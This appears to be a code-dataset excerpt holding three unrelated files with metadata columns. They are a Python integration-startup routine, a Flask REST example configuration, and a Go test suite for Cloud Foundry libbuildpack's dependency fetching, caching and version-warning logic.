stage_1_domains = domains & STAGE_1_INTEGRATIONS
stage_2_domains = domains - logging_domains - stage_1_domains
if logging_domains:
_LOGGER.info("Setting up %s", logging_domains)
await asyncio.gather(
*(async_setup_component(hass, domain, config) for domain in logging_domains)
)
# Kick off loading the registries. They don't need to be awaited.
asyncio.gather(
hass.helpers.device_registry.async_get_registry(),
hass.helpers.entity_registry.async_get_registry(),
hass.helpers.area_registry.async_get_registry(),
)
if stage_1_domains:
await asyncio.gather(
*(async_setup_component(hass, domain, config) for domain in stage_1_domains)
)
# Load all integrations
after_dependencies: Dict[str, Set[str]] = {}
for int_or_exc in await asyncio.gather(
*(loader.async_get_integration(hass, domain) for domain in stage_2_domains),
return_exceptions=True,
):
# Exceptions are handled in async_setup_component.
if isinstance(int_or_exc, loader.Integration) and int_or_exc.after_dependencies:
after_dependencies[int_or_exc.domain] = set(int_or_exc.after_dependencies)
last_load = None
while stage_2_domains:
domains_to_load = set()
for domain in stage_2_domains:
after_deps = after_dependencies.get(domain)
# Load if integration has no after_dependencies or they are
# all loaded
if not after_deps or not after_deps - hass.config.components:
domains_to_load.add(domain)
if not domains_to_load or domains_to_load == last_load:
break
_LOGGER.debug("Setting up %s", domains_to_load)
await asyncio.gather(
*(async_setup_component(hass, domain, config) for domain in domains_to_load)
)
last_load = domains_to_load
stage_2_domains -= domains_to_load
# These are stage 2 domains that never have their after_dependencies
# satisfied.
if stage_2_domains:
_LOGGER.debug("Final set up: %s", stage_2_domains)
await asyncio.gather(
*(async_setup_component(hass, domain, config) for domain in stage_2_domains)
)
# Wrap up startup
await hass.async_block_till_done()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
config.py
|
################
# File: /config.py
# Project: flask-restplus-server-example
# Created Date: Tue Dec 10th 2019
# Author: Ashok Kumar P (ParokshaX) ([email protected])
# -----
# Last Modified: Sat Feb 8th 2020
# Modified By: Ashok Kumar P (ParokshaX) ([email protected])
# -----
# Copyright (c) <<projectCreationYear>> Your Company
#################
# pylint: disable=too-few-public-methods,invalid-name,missing-docstring
import os
class BaseConfig(object):
SECRET_KEY = "this-really-needs-to-be-changed"
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
# POSTGRESQL
# DB_USER = 'user'
# DB_PASSWORD = 'password'
# DB_NAME = 'restplusdb'
# DB_HOST = 'localhost'
# DB_PORT = 5432
# SQLALCHEMY_DATABASE_URI = 'postgresql://{user}:{password}@{host}:{port}/{name}'.format(
# user=DB_USER,
# password=DB_PASSWORD,
# host=DB_HOST,
# port=DB_PORT,
# name=DB_NAME,
# )
# SQLITE
SQLALCHEMY_DATABASE_URI = "sqlite:///%s" % (
os.path.join(PROJECT_ROOT, "example.db")
)
DEBUG = False
ERROR_404_HELP = False
REVERSE_PROXY_SETUP = os.getenv("EXAMPLE_API_REVERSE_PROXY_SETUP", False)
AUTHORIZATIONS = {
"oauth2_password": {
"type": "oauth2",
"flow": "password",
"scopes": {},
"tokenUrl": "/auth/oauth2/token",
},
# TODO: implement other grant types for third-party apps
#'oauth2_implicit': {
# 'type': 'oauth2',
# 'flow': 'implicit',
# 'scopes': {},
# 'authorizationUrl': '/auth/oauth2/authorize',
# },
}
ENABLED_MODULES = (
"auth",
"users",
"teams",
"site_user",
"api",
)
STATIC_ROOT = os.path.join(PROJECT_ROOT, "static")
SWAGGER_UI_JSONEDITOR = True
SWAGGER_UI_OAUTH_CLIENT_ID = "documentation"
SWAGGER_UI_OAUTH_REALM = (
"Authentication for Flask-RESTplus Example server documentation"
)
SWAGGER_UI_OAUTH_APP_NAME = "Flask-RESTplus Example server documentation"
# TODO: consider if these are relevant for this project
SQLALCHEMY_TRACK_MODIFICATIONS = True
CSRF_ENABLED = True
class ProductionConfig(BaseConfig):
SECRET_KEY = os.getenv("EXAMPLE_API_SERVER_SECRET_KEY")
SQLALCHEMY_DATABASE_URI = os.getenv("EXAMPLE_API_SERVER_SQLALCHEMY_DATABASE_URI")
class DevelopmentConfig(BaseConfig):
DEBUG = True
class TestingConfig(BaseConfig):
TESTING = True
# Use in-memory SQLite database for testing
SQLALCHEMY_DATABASE_URI = "sqlite://"
|
[] |
[] |
[
"EXAMPLE_API_SERVER_SECRET_KEY",
"EXAMPLE_API_REVERSE_PROXY_SETUP",
"EXAMPLE_API_SERVER_SQLALCHEMY_DATABASE_URI"
] |
[]
|
["EXAMPLE_API_SERVER_SECRET_KEY", "EXAMPLE_API_REVERSE_PROXY_SETUP", "EXAMPLE_API_SERVER_SQLALCHEMY_DATABASE_URI"]
|
python
| 3 | 0 | |
src/redis/vendor/github.com/cloudfoundry/libbuildpack/manifest_test.go
|
package libbuildpack_test
import (
"bytes"
"errors"
"io/ioutil"
"os"
"path/filepath"
"time"
"github.com/cloudfoundry/libbuildpack"
"github.com/cloudfoundry/libbuildpack/ansicleaner"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"gopkg.in/jarcoal/httpmock.v1"
)
var _ = Describe("Manifest", func() {
var (
manifest *libbuildpack.Manifest
manifestDir string
err error
version string
currentTime time.Time
buffer *bytes.Buffer
logger *libbuildpack.Logger
)
BeforeEach(func() {
manifestDir = "fixtures/manifest/standard"
currentTime = time.Now()
httpmock.Reset()
buffer = new(bytes.Buffer)
logger = libbuildpack.NewLogger(ansicleaner.New(buffer))
})
JustBeforeEach(func() {
manifest, err = libbuildpack.NewManifest(manifestDir, logger, currentTime)
Expect(err).To(BeNil())
})
Describe("NewManifest", func() {
It("has a language", func() {
Expect(manifest.Language()).To(Equal("dotnet-core"))
})
})
Describe("CheckStackSupport", func() {
var (
oldCfStack string
)
BeforeEach(func() { oldCfStack = os.Getenv("CF_STACK") })
AfterEach(func() { err = os.Setenv("CF_STACK", oldCfStack); Expect(err).To(BeNil()) })
Context("Stack is supported", func() {
BeforeEach(func() {
manifestDir = "fixtures/manifest/stacks"
err = os.Setenv("CF_STACK", "cflinuxfs2")
Expect(err).To(BeNil())
})
It("returns nil", func() {
Expect(manifest.CheckStackSupport()).To(Succeed())
})
Context("with no dependencies listed", func() {
BeforeEach(func() {
manifestDir = "fixtures/manifest/no-deps"
})
It("returns nil", func() {
Expect(manifest.CheckStackSupport()).To(Succeed())
})
})
Context("by a single dependency", func() {
BeforeEach(func() {
manifestDir = "fixtures/manifest/stacks"
err = os.Setenv("CF_STACK", "xenial")
Expect(err).To(BeNil())
})
It("returns nil", func() {
Expect(manifest.CheckStackSupport()).To(Succeed())
})
})
})
Context("Stack is not supported", func() {
BeforeEach(func() {
err = os.Setenv("CF_STACK", "notastack")
Expect(err).To(BeNil())
})
It("returns nil", func() {
Expect(manifest.CheckStackSupport()).To(MatchError(errors.New("required stack notastack was not found")))
})
})
})
Describe("Version", func() {
Context("VERSION file exists", func() {
It("returns the version", func() {
version, err = manifest.Version()
Expect(err).To(BeNil())
Expect(version).To(Equal("99.99"))
})
})
Context("VERSION file does not exist", func() {
BeforeEach(func() {
manifestDir = "fixtures/manifest/duplicate"
})
It("returns an error", func() {
version, err = manifest.Version()
Expect(version).To(Equal(""))
Expect(err).ToNot(BeNil())
Expect(err.Error()).To(ContainSubstring("unable to read VERSION file"))
})
})
})
Describe("AllDependencyVersions", func() {
It("returns all the versions of the dependency", func() {
versions := manifest.AllDependencyVersions("dotnet-framework")
Expect(err).To(BeNil())
Expect(versions).To(Equal([]string{"1.0.0", "1.0.1", "1.0.3", "1.1.0"}))
})
})
Describe("IsCached", func() {
BeforeEach(func() {
var err error
manifestDir, err = ioutil.TempDir("", "cached")
Expect(err).To(BeNil())
data, err := ioutil.ReadFile("fixtures/manifest/fetch/manifest.yml")
Expect(err).To(BeNil())
err = ioutil.WriteFile(filepath.Join(manifestDir, "manifest.yml"), data, 0644)
Expect(err).To(BeNil())
})
AfterEach(func() {
Expect(os.RemoveAll(manifestDir)).To(Succeed())
})
Context("uncached", func() {
It("is false", func() {
Expect(manifest.IsCached()).To(BeFalse())
})
})
Context("cached", func() {
BeforeEach(func() {
dependenciesDir := filepath.Join(manifestDir, "dependencies")
Expect(os.MkdirAll(dependenciesDir, 0755)).To(Succeed())
})
It("is true", func() {
Expect(manifest.IsCached()).To(BeTrue())
})
})
})
Describe("FetchDependency", func() {
var tmpdir, outputFile string
BeforeEach(func() {
manifestDir = "fixtures/manifest/fetch"
tmpdir, err = ioutil.TempDir("", "downloads")
Expect(err).To(BeNil())
outputFile = filepath.Join(tmpdir, "out.tgz")
})
AfterEach(func() { err = os.RemoveAll(tmpdir); Expect(err).To(BeNil()) })
Context("uncached", func() {
Context("url exists and matches md5", func() {
BeforeEach(func() {
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-1-linux-x64.tgz",
httpmock.NewStringResponder(200, "exciting binary data"))
})
It("downloads the file to the requested location", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(err).To(BeNil())
Expect(ioutil.ReadFile(outputFile)).To(Equal([]byte("exciting binary data")))
})
It("makes intermediate directories", func() {
outputFile = filepath.Join(tmpdir, "notexist", "out.tgz")
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(err).To(BeNil())
Expect(ioutil.ReadFile(outputFile)).To(Equal([]byte("exciting binary data")))
})
})
Context("url returns 404", func() {
BeforeEach(func() {
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-1-linux-x64.tgz",
httpmock.NewStringResponder(404, "exciting binary data"))
})
It("raises error", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(err).ToNot(BeNil())
})
It("alerts the user that the url could not be downloaded", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(err).NotTo(BeNil())
Expect(err.Error()).To(ContainSubstring("could not download: 404"))
Expect(buffer.String()).ToNot(ContainSubstring("to ["))
})
It("outputfile does not exist", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(outputFile).ToNot(BeAnExistingFile())
})
})
Context("url exists but does not match md5", func() {
BeforeEach(func() {
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-1-linux-x64.tgz",
httpmock.NewStringResponder(200, "other data"))
})
It("raises error", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(err).ToNot(BeNil())
})
It("outputfile does not exist", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(outputFile).ToNot(BeAnExistingFile())
})
})
})
Context("cached", func() {
var dependenciesDir string
BeforeEach(func() {
var err error
manifestDir, err = ioutil.TempDir("", "cached")
Expect(err).To(BeNil())
dependenciesDir = filepath.Join(manifestDir, "dependencies")
os.MkdirAll(dependenciesDir, 0755)
data, err := ioutil.ReadFile("fixtures/manifest/fetch/manifest.yml")
Expect(err).To(BeNil())
err = ioutil.WriteFile(filepath.Join(manifestDir, "manifest.yml"), data, 0644)
Expect(err).To(BeNil())
outputFile = filepath.Join(tmpdir, "out.tgz")
})
Context("url exists cached on disk under old format and matches md5", func() {
BeforeEach(func() {
ioutil.WriteFile(filepath.Join(dependenciesDir, "https___example.com_dependencies_thing-2-linux-x64.tgz"), []byte("awesome binary data"), 0644)
})
It("copies the cached file to outputFile", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).To(BeNil())
Expect(ioutil.ReadFile(outputFile)).To(Equal([]byte("awesome binary data")))
})
It("makes intermediate directories", func() {
outputFile = filepath.Join(tmpdir, "notexist", "out.tgz")
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).To(BeNil())
Expect(ioutil.ReadFile(outputFile)).To(Equal([]byte("awesome binary data")))
})
})
Context("url exists cached on disk under new format and matches md5", func() {
BeforeEach(func() {
os.MkdirAll(filepath.Join(dependenciesDir, "c4fef5682adf1c19c7f9b76fde9d0ecb"), 0755)
Expect(ioutil.WriteFile(filepath.Join(dependenciesDir, "c4fef5682adf1c19c7f9b76fde9d0ecb", "thing-2-linux-x64.tgz"), []byte("awesome binary data"), 0644)).To(Succeed())
})
It("copies the cached file to outputFile", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).To(BeNil())
Expect(ioutil.ReadFile(outputFile)).To(Equal([]byte("awesome binary data")))
})
It("makes intermediate directories", func() {
outputFile = filepath.Join(tmpdir, "notexist", "out.tgz")
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).To(BeNil())
Expect(ioutil.ReadFile(outputFile)).To(Equal([]byte("awesome binary data")))
})
})
Context("url exists cached on disk under old format and does not match md5", func() {
BeforeEach(func() {
ioutil.WriteFile(filepath.Join(dependenciesDir, "https___example.com_dependencies_thing-2-linux-x64.tgz"), []byte("different binary data"), 0644)
})
It("raises error", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).ToNot(BeNil())
})
It("outputfile does not exist", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(outputFile).ToNot(BeAnExistingFile())
})
})
Context("url exists cached on disk under new format and does not match md5", func() {
BeforeEach(func() {
os.MkdirAll(filepath.Join(dependenciesDir, "c4fef5682adf1c19c7f9b76fde9d0ecb"), 0755)
Expect(ioutil.WriteFile(filepath.Join(dependenciesDir, "c4fef5682adf1c19c7f9b76fde9d0ecb", "thing-2-linux-x64.tgz"), []byte("different binary data"), 0644)).To(Succeed())
})
It("raises error", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).ToNot(BeNil())
})
It("outputfile does not exist", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(outputFile).ToNot(BeAnExistingFile())
})
})
Context("url is not cached on disk", func() {
It("raises error", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).ToNot(BeNil())
})
})
})
})
Describe("InstallDependency", func() {
var outputDir string
BeforeEach(func() {
manifestDir = "fixtures/manifest/fetch"
outputDir, err = ioutil.TempDir("", "downloads")
Expect(err).To(BeNil())
})
AfterEach(func() {
err = os.RemoveAll(outputDir)
Expect(err).To(BeNil())
})
Context("uncached", func() {
Context("url exists and matches md5", func() {
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/real_tar_file-3-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("logs the name and version of the dependency", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_tar_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring("-----> Installing real_tar_file 3"))
})
It("extracts a file at the root", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_tar_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "root.txt")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "root.txt"))).To(Equal([]byte("root\n")))
})
It("extracts a nested file", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_tar_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "thing", "bin", "file2.exe")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "thing", "bin", "file2.exe"))).To(Equal([]byte("progam2\n")))
})
It("makes intermediate directories", func() {
outputDir = filepath.Join(outputDir, "notexist")
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_tar_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "thing", "bin", "file2.exe")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "thing", "bin", "file2.exe"))).To(Equal([]byte("progam2\n")))
})
Context("version is NOT latest in version line", func() {
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-6.2.2-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("warns the user", func() {
patchWarning := "**WARNING** A newer version of thing is available in this buildpack. " +
"Please adjust your app to use version 6.2.3 instead of version 6.2.2 as soon as possible. " +
"Old versions of thing are only provided to assist in migrating to newer versions.\n"
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "6.2.2"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(patchWarning))
})
})
Context("version is latest in version line", func() {
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-6.2.3-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("does not warn the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "6.2.3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).NotTo(ContainSubstring("newer version"))
})
})
Context("version is not semver", func() {
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://buildpacks.cloudfoundry.org/dependencies/godep/godep-v79-linux-x64-9e37ce0f.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("does not warn the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "godep", Version: "v79"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).NotTo(ContainSubstring("newer version"))
})
})
Context("version has an EOL, version line is major", func() {
const warning = "**WARNING** thing 4.x will no longer be available in new buildpacks released after 2017-03-01."
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-4.6.1-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
Context("less than 30 days in the future", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2017-02-15")
Expect(err).To(BeNil())
})
It("warns the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "4.6.1"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(warning))
})
Context("dependency EOL has a link associated with it", func() {
It("includes the link in the warning", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "4.6.1"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring("See: http://example.com/eol-policy"))
})
})
Context("dependency EOL does not have a link associated with it", func() {
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-5.2.3-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("does not include the word 'See:' in the warning", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "5.2.3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).ToNot(ContainSubstring("See:"))
})
})
})
Context("in the past", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2017-12-15")
Expect(err).To(BeNil())
})
It("warns the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "4.6.1"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(warning))
})
})
Context("more than 30 days in the future", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2016-10-15")
Expect(err).To(BeNil())
})
It("does not warn the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "4.6.1"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).ToNot(ContainSubstring(warning))
})
})
})
Context("version has an EOL, version line is major + minor", func() {
const warning = "**WARNING** thing 6.2.x will no longer be available in new buildpacks released after 2018-04-01"
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-6.2.3-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
Context("less than 30 days in the future", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2018-03-29")
Expect(err).To(BeNil())
})
It("warns the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "6.2.3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(warning))
})
})
Context("in the past", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2019-12-30")
Expect(err).To(BeNil())
})
It("warns the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "6.2.3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(warning))
})
})
Context("more than 30 days in the future", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2018-01-15")
Expect(err).To(BeNil())
})
It("does not warn the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "6.2.3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).ToNot(ContainSubstring(warning))
})
})
})
Context("version has an EOL, version line non semver", func() {
const warning = "**WARNING** nonsemver abc-1.2.3-def-4.5.6 will no longer be available in new buildpacks released after 2018-04-01"
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/nonsemver-abc-1.2.3-def-4.5.6-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
Context("less than 30 days in the future", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2018-03-29")
Expect(err).To(BeNil())
})
It("warns the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "nonsemver", Version: "abc-1.2.3-def-4.5.6"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(warning))
})
})
Context("in the past", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2019-12-30")
Expect(err).To(BeNil())
})
It("warns the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "nonsemver", Version: "abc-1.2.3-def-4.5.6"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(warning))
})
})
Context("more than 30 days in the future", func() {
BeforeEach(func() {
currentTime, err = time.Parse("2006-01-02", "2018-01-15")
Expect(err).To(BeNil())
})
It("does not warn the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "nonsemver", Version: "abc-1.2.3-def-4.5.6"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).ToNot(ContainSubstring(warning))
})
})
})
Context("version does not have an EOL", func() {
const warning = "**WARNING** real_tar_file 3 will no longer be available in new buildpacks released after"
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/real_tar_file-3-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("does not warn the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_tar_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).ToNot(ContainSubstring(warning))
})
})
})
Context("url exists but does not match md5", func() {
BeforeEach(func() {
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-1-linux-x64.tgz",
httpmock.NewStringResponder(200, "other data"))
})
It("logs the name and version of the dependency", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputDir)
Expect(err).ToNot(BeNil())
Expect(buffer.String()).To(ContainSubstring("-----> Installing thing 1"))
})
It("outputfile does not exist", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputDir)
Expect(err).ToNot(BeNil())
Expect(filepath.Join(outputDir, "root.txt")).ToNot(BeAnExistingFile())
})
})
})
Context("cached", func() {
var (
dependenciesDir string
outputDir string
)
BeforeEach(func() {
manifestDir, err = ioutil.TempDir("", "cached")
Expect(err).To(BeNil())
dependenciesDir = filepath.Join(manifestDir, "dependencies")
os.MkdirAll(dependenciesDir, 0755)
data, err := ioutil.ReadFile("fixtures/manifest/fetch/manifest.yml")
Expect(err).To(BeNil())
err = ioutil.WriteFile(filepath.Join(manifestDir, "manifest.yml"), data, 0644)
Expect(err).To(BeNil())
outputDir, err = ioutil.TempDir("", "downloads")
Expect(err).To(BeNil())
})
Context("url exists cached on disk and matches md5", func() {
BeforeEach(func() {
libbuildpack.CopyFile("fixtures/thing.zip", filepath.Join(dependenciesDir, "https___example.com_dependencies_real_zip_file-3-linux-x64.zip"))
})
It("logs the name and version of the dependency", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_zip_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring("-----> Installing real_zip_file 3"))
})
It("extracts a file at the root", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_zip_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "root.txt")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "root.txt"))).To(Equal([]byte("root\n")))
})
It("extracts a nested file", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_zip_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "thing", "bin", "file2.exe")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "thing", "bin", "file2.exe"))).To(Equal([]byte("progam2\n")))
})
It("makes intermediate directories", func() {
outputDir = filepath.Join(outputDir, "notexist")
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_zip_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "thing", "bin", "file2.exe")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "thing", "bin", "file2.exe"))).To(Equal([]byte("progam2\n")))
})
})
})
})
Describe("InstallOnlyVersion", func() {
var outputDir string
BeforeEach(func() {
manifestDir = "fixtures/manifest/fetch"
outputDir, err = ioutil.TempDir("", "downloads")
Expect(err).To(BeNil())
})
AfterEach(func() { err = os.RemoveAll(outputDir); Expect(err).To(BeNil()) })
Context("there is only one version of the dependency", func() {
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/real_tar_file-3-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("installs", func() {
outputDir = filepath.Join(outputDir, "notexist")
err = manifest.InstallOnlyVersion("real_tar_file", outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "thing", "bin", "file2.exe")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "thing", "bin", "file2.exe"))).To(Equal([]byte("progam2\n")))
})
})
Context("there is more than one version of the dependency", func() {
It("fails", func() {
outputDir = filepath.Join(outputDir, "notexist")
err = manifest.InstallOnlyVersion("thing", outputDir)
Expect(err).NotTo(BeNil())
Expect(err.Error()).To(Equal("more than one version of thing found"))
})
})
Context("there are no versions of the dependency", func() {
It("fails", func() {
outputDir = filepath.Join(outputDir, "notexist")
err = manifest.InstallOnlyVersion("not_a_dependency", outputDir)
Expect(err).NotTo(BeNil())
Expect(err.Error()).To(Equal("no versions of not_a_dependency found"))
})
})
})
Describe("DefaultVersion", func() {
Context("requested name exists and default version is locked to the patch", func() {
It("returns the default", func() {
dep, err := manifest.DefaultVersion("node")
Expect(err).To(BeNil())
Expect(dep).To(Equal(libbuildpack.Dependency{Name: "node", Version: "6.9.4"}))
})
})
Context("requested name exists multiple times in dependencies and default version is locked to minor line", func() {
It("returns the default", func() {
dep, err := manifest.DefaultVersion("jruby")
Expect(err).To(BeNil())
Expect(dep).To(Equal(libbuildpack.Dependency{Name: "jruby", Version: "9.3.5"}))
})
})
Context("requested name exists multiple times in dependencies and default version is locked to major line", func() {
It("returns the default", func() {
dep, err := manifest.DefaultVersion("ruby")
Expect(err).To(BeNil())
Expect(dep).To(Equal(libbuildpack.Dependency{Name: "ruby", Version: "2.3.3"}))
})
})
Context("requested name exists (twice) in default version section", func() {
BeforeEach(func() { manifestDir = "fixtures/manifest/duplicate" })
It("returns an error", func() {
_, err := manifest.DefaultVersion("bower")
Expect(err).ToNot(BeNil())
Expect(err.Error()).To(Equal("found 2 default versions for bower"))
})
})
Context("requested name does not exist", func() {
It("returns an error", func() {
_, err := manifest.DefaultVersion("notexist")
Expect(err).ToNot(BeNil())
Expect(err.Error()).To(Equal("no default version for notexist"))
})
})
})
Describe("CheckBuildpackVersion", func() {
var cacheDir string
BeforeEach(func() {
cacheDir, err = ioutil.TempDir("", "cache")
})
AfterEach(func() {
err = os.RemoveAll(cacheDir)
Expect(err).To(BeNil())
})
Context("BUILDPACK_METADATA exists", func() {
Context("The language does not match", func() {
BeforeEach(func() {
metadata := "---\nlanguage: diffLang\nversion: 99.99"
ioutil.WriteFile(filepath.Join(cacheDir, "BUILDPACK_METADATA"), []byte(metadata), 0666)
})
